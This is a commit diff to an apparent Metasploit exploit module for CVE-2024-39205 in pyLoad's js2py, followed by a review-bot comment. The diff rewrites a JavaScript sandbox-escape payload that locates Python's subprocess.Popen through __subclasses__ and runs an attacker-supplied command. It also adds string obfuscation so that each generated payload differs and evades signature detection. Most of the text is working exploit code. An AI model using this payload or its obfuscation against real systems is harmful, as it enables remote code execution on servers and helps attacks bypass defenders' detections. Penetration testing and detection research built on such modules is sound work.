
Commit 4e1f333

committed
Ofuscation and Gemfile update
1 parent 2ba8a6c commit 4e1f333


2 files changed

+16
-7
lines changed


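--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -439,7 +439,7 @@ GEM
 rex-random_identifier
 rex-text
 ruby-rc4
-rex-random_identifier (0.1.12)
+rex-random_identifier (0.1.13)
 rex-text
 rex-registry (0.1.5)
 rex-rop_builder (0.1.5)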

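--- a/modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
+++ b/modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
@@ -115,21 +115,24 @@ def exploit
 def javascript_payload(cmd)
 js_vars = Rex::RandomIdentifier::Generator.new({ language: :javascript })
 
-<<~EOS
+js = <<~EOS
 let #{js_vars[:command]} = "#{cmd}"
 let #{js_vars[:hacked]}, #{js_vars[:bymarve]}, #{js_vars[:n11]}
 let #{js_vars[:getattr]}, #{js_vars[:obj]}
 
+#{js_vars[:base]} = '__base__'
+#{js_vars[:getattribute]} = '__getattribute__'
 #{js_vars[:hacked]} = Object.getOwnPropertyNames({})
-#{js_vars[:bymarve]} = #{js_vars[:hacked]}.__getattribute__
+#{js_vars[:bymarve]} = #{js_vars[:hacked]}[#{js_vars[:getattribute]}]
 #{js_vars[:n11]} = #{js_vars[:bymarve]}("__getattribute__")
-#{js_vars[:obj]} = #{js_vars[:n11]}("__class__").__base__
-#{js_vars[:getattr]} = #{js_vars[:obj]}.__getattribute__
+#{js_vars[:obj]} = #{js_vars[:n11]}("__class__")[#{js_vars[:base]}]
+#{js_vars[:getattr]} = #{js_vars[:obj]}[#{js_vars[:getattribute]}]
+#{js_vars[:sub_class]} = '__subclasses__';
 
 function #{js_vars[:findpopen]}(#{js_vars[:o]}) {
 let #{js_vars[:result]};
-for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
-let #{js_vars[:item]} = #{js_vars[:o]}.__subclasses__()[#{js_vars[:i]}]
+for(let #{js_vars[:i]} in #{js_vars[:o]}[#{js_vars[:sub_class]}]()) {
+let #{js_vars[:item]} = #{js_vars[:o]}[#{js_vars[:sub_class]}]()[#{js_vars[:i]}]
 if(#{js_vars[:item]}.__module__ == "subprocess" && #{js_vars[:item]}.__name__ == "Popen") {
 return #{js_vars[:item]}
 }
@@ -141,6 +144,12 @@ def javascript_payload(cmd)
 
 #{js_vars[:n11]} = #{js_vars[:findpopen]}(#{js_vars[:obj]})(#{js_vars[:command]}, -1, null, -1, -1, -1, null, null, true).communicate()
 EOS
+
+opts = { "Strings" => true }
+
+js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
+js.obfuscate(memory_sensitive: true)
+js.to_s
 end
 
 def execute_command(cmd, _opts = {})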
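Review bot: The three names introduced in the first hunk (`js_vars[:base]`, `js_vars[:getattribute]`, `js_vars[:sub_class]`) are assigned without a declaration, while every other generated name appears in the `let` lines at the top of the heredoc, and only the `sub_class` assignment ends in `;`. Listing them in the existing `let` block and dropping the stray semicolon would keep the template consistent. In the second hunk `js` is rebound from the heredoc String to the `ObfuscateJS` object and `opts` is used once, so a separately named local for the obfuscator would read more clearly. `javascript_payload` also has no comment saying that it now returns transformed text; something like `# Returns the template after Rex string obfuscation, so the generated script differs from the heredoc on every run` would tell maintainers and anyone writing detections for CVE-2024-39205 not to rely on the literal template. The lines of the method between the two hunks are not visible here.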
